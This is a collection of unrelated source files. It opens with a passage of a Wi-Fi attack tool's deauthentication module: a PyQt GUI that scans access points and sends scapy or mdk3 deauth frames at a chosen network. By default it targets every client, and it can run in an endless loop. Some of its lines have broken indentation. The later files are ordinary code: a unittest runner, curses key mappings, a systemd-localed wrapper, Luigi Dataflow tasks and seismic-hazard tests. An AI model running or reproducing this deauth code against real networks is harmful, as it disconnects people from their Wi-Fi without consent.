        self.form2 = QFormLayout()
        # NOTE(review): self.list_clicked is not defined in the visible part
        # of this class -- confirm the handler exists before connecting.
        self.list = QListWidget()
        self.list.clicked.connect(self.list_clicked)
        self.list.setFixedHeight(20)
        # Scan results table: Channel / Essid / Bssid columns.
        self.tables = QTableWidget(5,3)
        self.tables.setFixedWidth(350)
        self.tables.setRowCount(100)
        self.tables.setFixedHeight(200)
        self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
        self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
        self.tables.clicked.connect(self.select_target)
        self.tables.resizeColumnsToContents()
        self.tables.resizeRowsToContents()
        self.tables.horizontalHeader().resizeSection(1,120)
        self.tables.horizontalHeader().resizeSection(0,60)
        self.tables.horizontalHeader().resizeSection(2,158)
        self.tables.verticalHeader().setVisible(False)
        Headers = []
        for n, key in enumerate(self.data.keys()):
            Headers.append(key)
        self.tables.setHorizontalHeaderLabels(Headers)
        self.linetarget = QLineEdit()
        # Default client: broadcast address (deauth every client of the AP).
        self.input_client = QLineEdit(self)
        self.input_client.setText("FF:FF:FF:FF:FF:FF")
        self.btn_enviar = QPushButton("Send Attack", self)
        self.btn_enviar.clicked.connect(self.attack_deauth)
        self.btn_scan = QPushButton(" Network Scan ", self)
        self.btn_scan.clicked.connect(self.exec_sniff)
        self.btn_stop = QPushButton("Stop Attack ", self)
        self.btn_stop.clicked.connect(self.kill_thread)
        self.btn_enviar.setFixedWidth(170)
        self.btn_stop.setFixedWidth(170)
        #icons
        self.btn_scan.setIcon(QIcon("rsc/network.png"))
        self.btn_enviar.setIcon(QIcon("rsc/start.png"))
        self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
        # Packet count choices; "infinite loop" is handled in attack_deauth.
        self.w_pacote = QComboBox(self)
        self.w_pacote.addItem("1000 ")
        self.w_pacote.addItem("2000 ")
        self.w_pacote.addItem("3000 ")
        self.w_pacote.addItem("4000 ")
        self.w_pacote.addItem("5000 ")
        self.w_pacote.addItem("10000 ")
        self.w_pacote.addItem("infinite loop")
        self.time_scan = QComboBox(self)
        self.time_scan.addItem("10s")
        self.time_scan.addItem("20s")
        self.time_scan.addItem("30s")
        # Only wlan* adapters are offered for monitor mode.
        self.get_placa = QComboBox(self)
        Interfaces = frm_dhcp_Attack()
        n = Interfaces.placa()
        for i,j in enumerate(n):
            if search("wlan", j):
                self.get_placa.addItem(n[i])
        self.form0.addRow("Network scan time:", self.time_scan)
        self.form1.addRow(self.tables)
        self.form1.addRow(self.get_placa, self.btn_scan)
        self.form1.addRow("Target:", self.linetarget)
        self.form1.addRow("Packet:",self.w_pacote)
        self.form1.addRow("Client:", self.input_client)
        self.form1.addRow("Status Attack:", self.controlador)
        self.form2.addRow(self.btn_enviar, self.btn_stop)
        self.Main.addLayout(self.form0)
        self.Main.addLayout(self.form1)
        self.Main.addLayout(self.form2)
        self.setLayout(self.Main)
    def scan_diveces_airodump(self):
        """Scan with airodump-ng (via fuc_airodump helpers) and fill the table.

        Runs on a worker thread started by exec_sniff when the scapy scan
        option is disabled in settings.
        """
        dirpath = "Settings/Dump"
        if not path.isdir(dirpath):
            makedirs(dirpath)
        self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
        exit_air = airdump_start()
        self.fix = False
        # airdump_start() returning None indicates the capture succeeded.
        if exit_air == None:
            self.cap = get_network_scan()
            if self.cap != None:
                # Each entry is "channel||essid||bssid".
                for i in self.cap:
                    i = i.split("||")
                    if self.check_is_mac(i[2]):
                        Headers = []
                        self.data['Channel'].append(i[0])
                        self.data['Essid'].append(i[1])
                        self.data['Bssid'].append(i[2])
                        # Re-render the whole table with the data so far.
                        for n, key in enumerate(self.data.keys()):
                            Headers.append(key)
                            for m, item in enumerate(self.data[key]):
                                item = QTableWidgetItem(item)
                                item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
                                self.tables.setItem(m, n, item)
                self.cap =[]
def kill_thread(self):
self.attack_OFF()
self.control = 1
dat = self.xmlcheck.xmlSettings("item1","deauth_mdk3",None,False)
if dat == "True":
popen("killall xterm")
    def exec_sniff(self):
        """Put the chosen adapter in monitor mode and run a network scan.

        Uses scapy sniffing when enabled in settings, otherwise delegates
        to the airodump thread. Results populate self.data and the table.
        """
        self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
        dot =1
        count = 0
        self.options_scan = self.xmlcheck.xmlSettings("monitor0", "scan_scapy", None, False)
        if self.get_placa.currentText() == "":
            QMessageBox.information(self, "Network Adapter", 'Network Adapter Not found try again.')
        else:
            # Restart monitor mode: stop an existing mon0 first if present.
            comando = "ifconfig"
            proc = Popen(comando,stdout=PIPE, shell=False)
            data = proc.communicate()[0]
            if search("mon0", data):
                dot = 0
                c = "airmon-ng stop mon0".split()
                Popen(c,stdout=PIPE, shell=False)
                system("airmon-ng start %s" %(self.get_placa.currentText()))
            else:
                system("airmon-ng start %s" %(self.get_placa.currentText()))
            if self.time_scan.currentText() == "10s":
                count = 10
            elif self.time_scan.currentText() == "20s":
                count = 20
            elif self.time_scan.currentText() == "30s":
                count = 30
            if self.options_scan == "True":
                # Scapy path: Scanner_devices appends (bssid, "ch | essid")
                # pairs to self.ap_list while sniffing beacons.
                sniff(iface=self.interface, prn =self.Scanner_devices, timeout=count)
                t = len(self.ap_list) -1
                i = 0
                items = []
                cap = []
                for i in range(t):
                    if len(self.ap_list[i]) < len(self.ap_list[i+1]):
                        if i != 0:
                            for index in xrange(self.list.count()):
                                items.append(self.list.item(index))
                            # NOTE(review): due to operator precedence this
                            # reads as `ap_list[i] or (ap_list[i+1] in items)`
                            # -- a truthy string always short-circuits, so the
                            # duplicate check likely never fires. Confirm.
                            if self.ap_list[i] or self.ap_list[i+1] in items:
                                pass
                            else:
                                self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
                            if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
                                cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
                        else:
                            self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
                            if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
                                cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
                    else:
                        self.list.addItem(self.ap_list[i+1] + " " + self.ap_list[i])
                        if not (self.ap_list[i+1] + " " + self.ap_list[i]) in cap:
                            cap.append(self.ap_list[i+1] + " " + self.ap_list[i])
                    # NOTE(review): comparing a string against an int -- in
                    # Python 2 this is always False, so the break is dead.
                    if self.ap_list[i] < i:
                        pass
                        break
                else:
                    dot = 1
                self.list.clear()
                # cap entries look like "bssid ch | essid"; split() yields
                # [bssid, ch, '|', essid]-style fields used below.
                for i in cap:
                    dat = i.split()
                    if self.check_is_mac(dat[3]):
                        self.data['Channel'].append(dat[0])
                        self.data['Essid'].append(dat[2])
                        self.data['Bssid'].append(dat[3])
                        Headers = []
                        for n, key in enumerate(self.data.keys()):
                            Headers.append(key)
                            for m, item in enumerate(self.data[key]):
                                item = QTableWidgetItem(item)
                                item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
                                self.tables.setItem(m, n, item)
                cap = []
                self.ap_list = []
            else:
                # Airodump path: run the capture on a daemon thread.
                self.thread_airodump = threading.Thread(target=self.scan_diveces_airodump)
                self.thread_airodump.daemon = True
                self.thread_airodump.start()
    def Scanner_devices(self,pkt):
        """Scapy sniff callback: collect APs from 802.11 beacon frames."""
        # type 0 / subtype 8 == management / beacon frame
        if pkt.type == 0 and pkt.subtype == 8:
            if pkt.addr2 not in self.ap_list:
                # Store the BSSID followed by a "channel | essid" string;
                # Dot11Elt index 3 carries the DS parameter set (channel).
                self.ap_list.append(pkt.addr2)
                self.ap_list.append(str(int(ord(pkt[Dot11Elt:3].info)))+" | " + pkt.info)
                print "AP MAC: %s with SSID: %s CH %d"%(pkt.addr2, pkt.info, int(ord(pkt[Dot11Elt:3].info)))
    def attack_deauth(self):
        """Start a deauthentication attack against the MAC in self.linetarget.

        Depending on the "deauth_scapy" setting read from the XML config, the
        attack runs either via scapy (self.deauth_attacker) or via the
        external mdk3 tool (self.mdk3_attacker), each in a daemon thread.
        """
        if self.linetarget.text() == "":
            QMessageBox.information(self, "Target Error", "Please, first select Target for attack")
        else:
            self.ss = None
            # NOTE(review): "infinite loop" maps to a packet count of 1, which
            # deauth_attacker treats as the endless-loop sentinel (see below)
            if self.w_pacote.currentText() == "infinite loop":
                self.ss = 1
            else:
                self.ss = int(self.w_pacote.currentText())
            self.bssid = str(self.linetarget.text())
            # read attack backend choice and mdk3 arguments from settings XML
            self.deauth_check = self.xmlcheck.xmlSettings("item0", "deauth_scapy",None,False)
            self.args = self.xmlcheck.xmlSettings("mdk3","arguments", None, False)
            if self.deauth_check == "True":
                # scapy-based attack
                self.controlador.setText("[ ON ]")
                self.controlador.setStyleSheet("QLabel { color : green; }")
                self.t = threading.Thread(target=self.deauth_attacker, args=(self.bssid,str(self.input_client.text()), self.ss))
                self.t.daemon = True
                self.t.start()
            else:
                # mdk3-based attack
                self.controlador.setText("[ ON ]")
                self.controlador.setStyleSheet("QLabel { color : green; }")
                self.t = threading.Thread(target=self.mdk3_attacker, args=(self.bssid,self.args,))
                self.t.daemon = True
                self.t.start()
    def attack_OFF(self):
        """Flip the UI status label to "[ OFF ]" and clear the terminal."""
        self.controlador.setText("[ OFF ]")
        self.controlador.setStyleSheet("QLabel { color : red; }")
        system("clear")
    def mdk3_attacker(self,bssid,args):
        """Run the external mdk3 tool against *bssid* in a spawned xterm,
        then flip the UI back to the OFF state.

        NOTE(review): bssid/args are interpolated straight into a shell
        command line; a crafted value would be executed by the shell.
        """
        # popen().read() blocks until the command's stdout closes; appending
        # "exit" guarantees the sentinel checked below is present
        n = (popen("""sudo xterm -geometry 75x15-1+200 -T "mdk3 Target: %s" -e mdk3 mon0 %s %s & mdk3=$!"""%(bssid,args,bssid)).read()) + "exit"
        # "dsa" never matches, so this loop only exists to run the check once
        while n != "dsa":
            if n == "exit":
                self.attack_OFF()
                break
    def deauth_attacker(self,bssid, client, count):
        """Send 802.11 deauthentication frames with scapy.

        :param bssid: target AP MAC address
        :param client: client MAC address to deauthenticate
        :param count: number of frames to send; a value of 1 means loop
                      forever until self.control is set from elsewhere
        """
        self.control = None
        bot = 0  # NOTE(review): assigned but never used afterwards
        conf.verb = 0
        conf.iface = self.interface
        # management frame (type 0), subtype 12 == deauthentication,
        # reason code 7 ("Class 3 frame received from nonassociated STA")
        packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
        deauth_ap = Dot11(addr1=bssid, addr2=bssid, addr3=bssid)/Dot11Deauth()
        deauth_pkt2 = Dot11(addr1=bssid, addr2=client, addr3=client)/Dot11Deauth()
        # stored on the instance; only `packet` is actually sent below
        self.pacote.append(deauth_pkt2)
        self.pacote.append(deauth_ap)
        if count == 1:
            # "infinite" mode: keep sending until self.control becomes non-None
            while count != 0:
                try:
                    sendp(packet)
                    print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
                    if self.control == None:
                        pass
                    else:
                        self.attack_OFF()
                        count = 0
                        popen("clear")
                except KeyboardInterrupt:
                    print "::"
                    sys.exit()
        else:
            # bounded mode: send exactly `count` frames unless stopped early
            for n in range(int(count)):
                try:
                    sendp(packet)
                    print 'Deauth sent via: ' + conf.iface + ' to BSSID: ' + bssid + ' for Client: ' + client
                    if self.control == None:
                        pass
                    else:
                        self.attack_OFF()
                        popen("clear")
                        break
                except KeyboardInterrupt:
                    print "::"
                    sys.exit()
            self.attack_OFF()
def check_is_mac(self,value):
checked = re.compile(r"""(
^([0-9A-F]{2}[-]){5}([0-9A-F]{2})$
|^([0-9A-F]{2}[:]){5}([0-9A-F]{2})$
)""",
re.VERBOSE|re.IGNORECASE)
if checked.match(value) is None:
return False
else:
return True
    @pyqtSlot(QModelIndex)
    def list_clicked(self, index):
        """Slot for clicks on the AP list: copy the first MAC-address token
        of the clicked entry into the target line edit, or warn if none."""
        itms = self.list.selectedIndexes()
        for i in itms:
            # split the clicked text on whitespace and look for a MAC token
            attack = str(i.data().toString()).split()
            # NOTE(review): the inner loop shadows the outer loop variable `i`
            for i in attack:
                if self.check_is_mac(i.replace(" ", "")):
                    self.linetarget.setText(str(i))
        if self.linetarget.text() == "":
            QMessageBox.information(self, "MacAddress", "Error check the Mac Target, please set the mac valid.")
| stevenliuit/3vilTwinAttacker | Modules/deauth_func.py | Python | mit | 15,164 |
'''
Created on Aug 28, 2010
@author: Aaron Cooper
'''
import importlib
import os
import sys
import unittest
def my_import(name):
    """Import the (possibly dotted) module *name* and return the module itself.

    A bare ``__import__("a.b")`` returns the top-level package ``a``; this
    helper returns the leaf submodule ``a.b`` instead, which is exactly what
    :func:`importlib.import_module` provides.
    """
    return importlib.import_module(name)
if __name__ == "__main__":
    # Discover every "*test.py" module under ./unit_tests and run its suite.
    path = os.path.abspath(os.path.dirname(sys.argv[0]))
    files = os.listdir(path + "/unit_tests")
    runner = unittest.TextTestRunner()
    loader = unittest.TestLoader()
    for filename in files:  # renamed: `file` shadowed the builtin
        if filename.lower().endswith('test.py'):
            moduleName = filename.split('.')[0]
            mod = my_import('unit_tests.' + moduleName)
            suite = loader.loadTestsFromModule(mod)
runner.run(suite) | guineawheek/abc2as3 | src/unittest_main.py | Python | gpl-3.0 | 748 |
# -*- encoding: utf-8
"""
This file maps ugly curses keycodes to human readable versions.
"""
import curses
# Maps raw curses keycodes (ints) and curses key-name strings ("^X" style,
# kXXXn terminfo names) to human readable key identifiers.
key_map = {
    # Single keys
    # Function keys (trailing numbers are the curses keycode values)
    curses.KEY_F1: "f1",  # 265
    curses.KEY_F2: "f2",  # 266
    curses.KEY_F3: "f3",  # 267
    curses.KEY_F4: "f4",  # 268
    curses.KEY_F5: "f5",  # 269
    curses.KEY_F6: "f6",  # 270
    curses.KEY_F7: "f7",  # 271
    curses.KEY_F8: "f8",  # 272
    curses.KEY_F9: "f9",  # 273
    curses.KEY_F10: "f10",  # 274
    curses.KEY_F11: "f11",  # 275
    curses.KEY_F12: "f12",  # 276
    # Arrows, editing and navigation keys
    curses.KEY_UP: "up",
    curses.KEY_DOWN: "down",
    curses.KEY_LEFT: "left",
    curses.KEY_RIGHT: "right",
    curses.KEY_ENTER: "enter",
    "\n": "enter",
    "^J": "enter",
    curses.KEY_BACKSPACE: "backspace",
    "^?": "backspace",
    curses.KEY_DC: "delete",
    curses.KEY_HOME: "home",
    curses.KEY_END: "end",
    curses.KEY_PPAGE: "pageup",
    curses.KEY_NPAGE: "pagedown",
    # NOTE(review): raw keycode; assumed to be 'insert' on common terminals
    331: "insert",
    "\t": "tab",
    "^I": "tab",
    "^[": "escape",
    # Control
    "^A": "ctrl+a",
    "^B": "ctrl+b",
    "^C": "ctrl+c",
    "^D": "ctrl+d",
    "^E": "ctrl+e",
    "^F": "ctrl+f",
    "^G": "ctrl+g",
    "^H": "ctrl+h",
    # "^I": "ctrl+i",  # Conflicts with 'tab'
    # "^J": "ctrl+j",  # Conflicts with 'enter'
    "^K": "ctrl+k",
    "^L": "ctrl+l",
    # "^M": "ctrl+m",  # Conflicts with 'enter'
    "^N": "ctrl+n",
    "^O": "ctrl+o",
    "^P": "ctrl+p",
    "^Q": "ctrl+q",
    "^R": "ctrl+r",
    "^S": "ctrl+s",
    "^T": "ctrl+t",
    "^U": "ctrl+u",
    "^V": "ctrl+v",
    "^W": "ctrl+w",
    "^X": "ctrl+x",
    "^Y": "ctrl+y",
    # "^Z": "ctrl+z",  # Conflicts with suspend
    # Ctrl + arrows / paging (raw codes plus terminfo kXXX5 names)
    544: "ctrl+left",
    559: "ctrl+right",
    565: "ctrl+up",
    524: "ctrl+down",
    "kLFT5": "ctrl+left",
    "kRIT5": "ctrl+right",
    "kUP5": "ctrl+up",
    "kDN5": "ctrl+down",
    554: "ctrl+pageup",
    549: "ctrl+pagedown",
    # NOTE(review): kNXT5/kPRV5 look swapped relative to the alt block below
    # (there kPRV3 -> pageup, kNXT3 -> pagedown); verify on a real terminal
    "kNXT5": "ctrl+pageup",
    "kPRV5": "ctrl+pagedown",
    # Alt + arrows / paging (raw codes plus terminfo kXXX3 names)
    563: "alt+up",
    522: "alt+down",
    542: "alt+left",
    557: "alt+right",
    "kUP3": "alt+up",
    "kDN3": "alt+down",
    "kLFT3": "alt+left",
    "kRIT3": "alt+right",
    552: "alt+pageup",
    547: "alt+pagedown",
    "kPRV3": "alt+pageup",
    "kNXT3": "alt+pagedown",
    # Shift
    353: "shift+tab",
}
| severin31/suplemon | suplemon/key_mappings.py | Python | mit | 2,302 |
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.core.dbus import SystemBus
from pyanaconda.modules.common.constants.services import LOCALED
from pyanaconda.core.configuration.anaconda import conf
from pyanaconda.keyboard import join_layout_variant, parse_layout_variant
from pyanaconda.core.constants import DEFAULT_KEYBOARD
from pyanaconda.anaconda_loggers import get_module_logger
log = get_module_logger(__name__)
class LocaledWrapper(object):
    """Class wrapping systemd-localed daemon functionality.

    When the system bus (or the localed proxy) is unavailable, every method
    degrades gracefully: getters return empty values and setters do nothing.
    """
    def __init__(self):
        self._localed_proxy = None
        if not conf.system.provides_system_bus:
            log.debug("Not using localed service: "
                      "system does not provide system bus according to configuration.")
            return
        if not SystemBus.check_connection():
            log.debug("Not using localed service: "
                      "system bus connection check failed.")
            return
        self._localed_proxy = LOCALED.get_proxy()
    @property
    def keymap(self):
        """Get current VConsole keymap.

        :return: VConsole keymap specification
        :rtype: string
        """
        if not self._localed_proxy:
            return ""
        return self._localed_proxy.VConsoleKeymap
    @property
    def layouts_variants(self):
        """Get current X11 layouts with variants.

        :return: a list of "layout (variant)" or "layout" layout specifications
        :rtype: list(str)
        """
        if not self._localed_proxy:
            return []
        # localed exposes layouts and variants as parallel comma-separated lists
        layouts = self._localed_proxy.X11Layout
        variants = self._localed_proxy.X11Variant
        layouts = layouts.split(",") if layouts else []
        variants = variants.split(",") if variants else []
        # if there are more layouts than variants, empty strings should be appended
        diff = len(layouts) - len(variants)
        variants.extend(diff * [""])
        return [join_layout_variant(layout, variant) for layout, variant in zip(layouts, variants)]
    @property
    def options(self):
        """Get current X11 options.

        :return: a list of X11 options
        :rtype: list(str)
        """
        if not self._localed_proxy:
            return []
        options = self._localed_proxy.X11Options
        return options.split(",") if options else []
    def set_keymap(self, keymap, convert=False):
        """Set current VConsole keymap.

        :param keymap: VConsole keymap that should be set
        :type keymap: str
        :param convert: whether the keymap should be converted and set as X11 layout
        :type convert: bool
        """
        if not self._localed_proxy:
            # NOTE(review): returns "" here but None on success; the return
            # value appears to be unused by callers
            return ""
        self._localed_proxy.SetVConsoleKeyboard(keymap, "", convert, False)
    def convert_keymap(self, keymap):
        """Get X11 layouts and variants by converting VConsole keymap.

        NOTE: Systemd-localed performs the conversion. Current VConsole keymap
        and X11 layouts are set temporarily to the converted values in the
        process of conversion.

        :param keymap: VConsole keymap
        :type keymap: str
        :return: a list of "layout (variant)" or "layout" layout specifications
                 obtained by conversion of VConsole keymap
        :rtype: list(str)
        """
        if not self._localed_proxy:
            return []
        # hack around systemd's lack of functionality -- no function to just
        # convert without changing keyboard configuration
        orig_layouts_variants = self.layouts_variants
        orig_keymap = self.keymap
        converted_layouts = self.set_and_convert_keymap(keymap)
        # restore the configuration that was in effect before the conversion
        self.set_layouts(orig_layouts_variants)
        self.set_keymap(orig_keymap)
        return converted_layouts
    def set_and_convert_keymap(self, keymap):
        """Set VConsole keymap and set and get converted X11 layouts.

        :param keymap: VConsole keymap
        :type keymap: str
        :return: a list of "layout (variant)" or "layout" layout specifications
                 obtained by conversion from VConsole keymap
        :rtype: list(str)
        """
        self.set_keymap(keymap, convert=True)
        return self.layouts_variants
    def set_layouts(self, layouts_variants, options=None, convert=False):
        """Set X11 layouts.

        :param layouts_variants: list of 'layout (variant)' or 'layout'
                                 specifications of layouts and variants
        :type layouts_variants: list(str)
        :param options: list of X11 options that should be set
        :type options: list(str)
        :param convert: whether the layouts should be converted to a VConsole keymap
                        (see set_and_convert_layouts)
        :type convert: bool
        """
        if not self._localed_proxy:
            return
        layouts = []
        variants = []
        # skip empty entries and split each one into its layout/variant parts
        for layout_variant in (nonempty for nonempty in layouts_variants if nonempty):
            (layout, variant) = parse_layout_variant(layout_variant)
            layouts.append(layout)
            variants.append(variant)
        layouts_str = ",".join(layouts)
        variants_str = ",".join(variants)
        options_str = ",".join(options) if options else ""
        # the empty string argument is the X11 model (deliberately unspecified)
        self._localed_proxy.SetX11Keyboard(
            layouts_str,
            "",
            variants_str,
            options_str,
            convert,
            False
        )
    def set_and_convert_layouts(self, layouts_variants):
        """Set X11 layouts and set and get converted VConsole keymap.

        :param layouts_variants: list of 'layout (variant)' or 'layout'
                                 specifications of layouts and variants
        :type layouts_variants: list(str)
        :return: a VConsole keymap obtained by conversion from X11 layouts
        :rtype: str
        """
        self.set_layouts(layouts_variants, convert=True)
        return self.keymap
    def convert_layouts(self, layouts_variants):
        """Get VConsole keymap by converting X11 layouts and variants.

        NOTE: Systemd-localed performs the conversion. Current VConsole keymap
        and X11 layouts are set temporarily to the converted values in the
        process of conversion.

        :param layouts_variants: list of 'layout (variant)' or 'layout'
                                 specifications of layouts and variants
        :type layouts_variants: list(str)
        :return: a VConsole keymap obtained by conversion from X11 layouts
        :rtype: str
        """
        if not self._localed_proxy:
            return ""
        # hack around systemd's lack of functionality -- no function to just
        # convert without changing keyboard configuration
        orig_layouts_variants = self.layouts_variants
        orig_keymap = self.keymap
        ret = self.set_and_convert_layouts(layouts_variants)
        # restore the configuration that was in effect before the conversion
        self.set_layouts(orig_layouts_variants)
        self.set_keymap(orig_keymap)
        return ret
def get_missing_keyboard_configuration(localed_wrapper, x_layouts, vc_keymap):
    """Fill in whichever keyboard settings are missing.

    When both values are empty, the default console keymap is used as the
    starting point.  A missing virtual console keymap is then derived from
    the X layouts (and vice versa) via systemd-localed conversion.

    :param localed_wrapper: instance of systemd-localed service wrapper
    :type localed_wrapper: LocaledWrapper
    :param x_layouts: list of X layout specifications
    :type x_layouts: list(str)
    :param vc_keymap: virtual console keyboard mapping name
    :type vc_keymap: str
    :returns: tuple of X layouts and VC keyboard settings
    :rtype: (list(str), str))
    """
    # Nothing specified at all -> start from the default console keymap.
    if not (vc_keymap or x_layouts):
        vc_keymap = DEFAULT_KEYBOARD
        log.debug("Using default value %s for missing virtual console keymap.", DEFAULT_KEYBOARD)
    # Derive whichever side is still missing from its counterpart.
    if not vc_keymap:
        vc_keymap = localed_wrapper.convert_layouts(x_layouts)
        log.debug("Missing virtual console keymap value %s converted from %s X layouts",
                  vc_keymap, x_layouts)
    if not x_layouts:
        x_layouts = localed_wrapper.convert_keymap(vc_keymap)
        log.debug("Missing X layouts value %s converted from %s virtual console keymap",
                  x_layouts, vc_keymap)
    return x_layouts, vc_keymap
| atodorov/anaconda | pyanaconda/modules/localization/localed.py | Python | gpl-2.0 | 9,105 |
import luigi
import target
from luigi_gcloud.dataflow import DataFlowJavaTask
from storage_tasks import CopyLocalToStorage
class CopyViaDataFlowToStorage(DataFlowJavaTask):
    """Luigi task that submits a Java Dataflow pipeline copying the day's
    mail data on cloud storage to a 'dump' target."""
    # the date this task instance processes
    day = luigi.DateParameter()
    def output(self):
        """GCS target whose existence marks this task as complete."""
        return target.storage_mail(self.day, 'dump').gcs
    def requires(self):
        """The day's data must first have been copied to storage."""
        return CopyLocalToStorage(self.day)
    def dataflow(self):
        """Path of the pipeline jar to submit to Dataflow."""
        return "/luigi-dataflow/pipeline/build/libs/pipeline-copy-1.0.jar"
    def configuration(self):
        """Dataflow runner settings (basic autoscaling, max 3 workers)."""
        return {
            "runner": "DataflowPipelineRunner",
            "autoscalingAlgorithm": "BASIC",
            "maxNumWorkers": "3"
        }
    def variables(self):
        """Input/output path placeholders passed to the pipeline."""
        return {
            'in': target.storage_mail_path(self.day).path,
            'out': target.storage_mail(self.day, 'df').path
        }
| alexvanboxel/luigiext-gcloud | examples/dataflow_tasks.py | Python | apache-2.0 | 812 |
# The Hazard Library
# Copyright (C) 2012-2017 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from openquake.hazardlib.source.complex_fault import (ComplexFaultSource,
_float_ruptures)
from openquake.hazardlib.geo import Line, Point
from openquake.hazardlib.geo.surface.simple_fault import SimpleFaultSurface
from openquake.hazardlib.scalerel.peer import PeerMSR
from openquake.hazardlib.mfd import EvenlyDiscretizedMFD
from openquake.hazardlib.tom import PoissonTOM
from openquake.hazardlib.tests.source import simple_fault_test
from openquake.hazardlib.tests.source import \
_complex_fault_test_data as test_data
from openquake.hazardlib.tests import assert_pickleable
class ComplexFaultSourceSimpleGeometryIterRupturesTestCase(
        simple_fault_test.SimpleFaultIterRupturesTestCase):
    # test that complex fault sources of simple geometry behave
    # exactly the same as simple fault sources of the same geometry
    def _make_source(self, *args, **kwargs):
        """Build the parent's simple fault source, then re-create it as an
        equivalent two-edge ComplexFaultSource."""
        source = super(ComplexFaultSourceSimpleGeometryIterRupturesTestCase,
                       self)._make_source(*args, **kwargs)
        surface = SimpleFaultSurface.from_fault_data(
            source.fault_trace, source.upper_seismogenic_depth,
            source.lower_seismogenic_depth, source.dip,
            source.rupture_mesh_spacing
        )
        mesh = surface.get_mesh()
        # first and last mesh rows become the complex fault's top/bottom edges
        top_edge = Line(list(mesh[0:1]))
        bottom_edge = Line(list(mesh[-1:]))
        cfs = ComplexFaultSource(
            source.source_id, source.name, source.tectonic_region_type,
            source.mfd, source.rupture_mesh_spacing,
            source.magnitude_scaling_relationship, source.rupture_aspect_ratio,
            source.temporal_occurrence_model, [top_edge, bottom_edge],
            source.rake
        )
        assert_pickleable(cfs)
        return cfs
class ComplexFaultSourceIterRupturesTestCase(
        simple_fault_test._BaseFaultSourceTestCase):
    """Rupture enumeration tests for complex fault sources; the expected
    values are derived by hand in the inline comments of each test."""
    def _make_source(self, mfd, aspect_ratio, rupture_mesh_spacing, edges):
        """Build a ComplexFaultSource from raw edge coordinate lists."""
        source_id = name = 'test-source'
        trt = self.TRT
        rake = self.RAKE
        tom = self.TOM
        magnitude_scaling_relationship = PeerMSR()
        rupture_aspect_ratio = aspect_ratio
        edges = [Line([Point(*coords) for coords in edge])
                 for edge in edges]
        cfs = ComplexFaultSource(
            source_id, name, trt, mfd, rupture_mesh_spacing,
            magnitude_scaling_relationship, rupture_aspect_ratio, tom,
            edges, rake
        )
        assert_pickleable(cfs)
        return cfs
    def test_1(self):
        # Complex fault source equivalent to Simple fault source defined
        # by only the top and bottom edges. That is the complex fault surface
        # is equivalent to a simple fault surface defined in the following way:
        # fault_trace = [Point(0.0,0.0,0.0),
        #                Point(0.0,0.0359728811758,0.0),
        #                Point(0.0190775080917,0.0550503815181,0.0),
        #                Point(0.03974514139,0.0723925718855,0.0)]
        # upper_seismo_depth = 0.0
        # lower_seismo_depth = 4.2426406871192848
        # dip = 45.0
        # mesh_spacing = 1.0
        # Being a regular surface and with points in the top and bottom edges
        # with a spacing that is a multiple of the given mesh spacing, the
        # expected mesh spacing is uniform and equal to the mesh_spacing given
        # in the constructor, that is 1 km. Each mesh cell has an area of
        # 1 squared km.
        # In this case the fmd contains only one magnitude (3.5),
        # and this originates ruptures with area equal to 0.3162277660168 km**2
        # (according to PeerTestMagAreaScalingRel area = 10**(3.5-4))
        # given an aspect ratio of 1, the rupture dimensions are:
        # rup_length = sqrt(0.31622776601683794 * 1) = 0.56234132519034907
        # rup_width = 0.56234132519034907
        # Rupture length corresponds therefore to two nodes along length, and
        # two nodes along width provides the closest area value, so each
        # rupture extends for two nodes along length and 2 nodes along width.
        # Given 11 nodes along length, and 7 along width, and assuming the
        # rupture offset to be equal to mesh_spacing, the total number of
        # ruptures along length is 10 and along width is 6. So the total number
        # is 60. the rate associated to a magnitude 3.5 from the truncated GR
        # (with bin width = 1.0) is 10**(0.5 -3.0) - 10**(0.5-4.0) =
        # 0.0028460498941515417 the rate associated to each rupture is
        # 0.0028460498941515417 / 60 = 4.7434164902525696e-05
        # for each rupture the probability of one or more occurrences is
        # 1-exp(- 4.7434164902525696e-05 * 50.0) = 0.0023688979672850108
        source = self._make_source(test_data.TEST1_MFD,
                                   test_data.TEST1_RUPTURE_ASPECT_RATIO,
                                   test_data.TEST1_MESH_SPACING,
                                   test_data.TEST1_EDGES)
        self._test_ruptures(test_data.TEST1_RUPTURES, source)
    def test_2(self):
        # Complex fault source equivalent to Simple fault source defined by
        # top, bottom and intermediate edges. That is the complex fault surface
        # is equivalent to a simple fault surface defined in the following way:
        # fault_trace = [Point(0.0,0.0,0.0),
